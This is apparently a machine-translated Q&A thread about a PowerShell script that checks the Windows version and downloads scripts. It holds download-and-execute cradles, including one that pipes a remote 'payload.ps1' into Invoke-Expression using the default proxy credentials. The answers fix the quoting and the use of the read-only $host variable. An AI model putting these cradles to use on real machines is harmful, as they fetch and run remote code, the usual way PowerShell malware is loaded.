0 
(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"

获取 Wmi 对象 Win32 操作系统默认网络凭据

$host = ((Get-WmiObject Win32_OperatingSystem).Caption)
    if ($host -eq 'Microsoft Windows 7'){

    Write-Host "[+] Downloading windows 7 script"

        $URL = http://example.com
        IEX (New-Object Net.WebClient).DownloadString('$URL')}

elseif ($host -eq 'Microsoft Windows 8'){

        Write-Host "[+] Downloading windows 8 script"

ETC...

4

2 回答 2

0

从提供的代码中,在 IEX 命令中,将双引号添加到环绕中,因为 Invoke-Expression 的 Command 参数接受字符串,并将单引号添加到 $URL 中。

    $URL = "http://example.com"
    IEX "(New-Object Net.WebClient).DownloadString('$URL')"

另外,Invoke-Expression 不需要运行 Net.WebClient,您可以简化如下。

     $URL = "http://example.com"
    (New-Object Net.WebClient).DownloadString($URL)
于 2019-04-20T03:14:21.283 回答
0

这就像$host一个自动变量一样发生。我的系统上的分配失败:

$host = ((Get-WmiObject Win32_OperatingSystem).Caption)
Cannot overwrite variable Host because it is read-only or constant.
At line:1 char:1
+ $host = ((Get-WmiObject Win32_OperatingSystem).Caption)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : WriteError: (Host:String) [], SessionStateUnauthorizedAccessException
    + FullyQualifiedErrorId : VariableNotWritable

尝试使用另一个变量名,例如$myHost.

于 2019-04-19T09:24:19.097 回答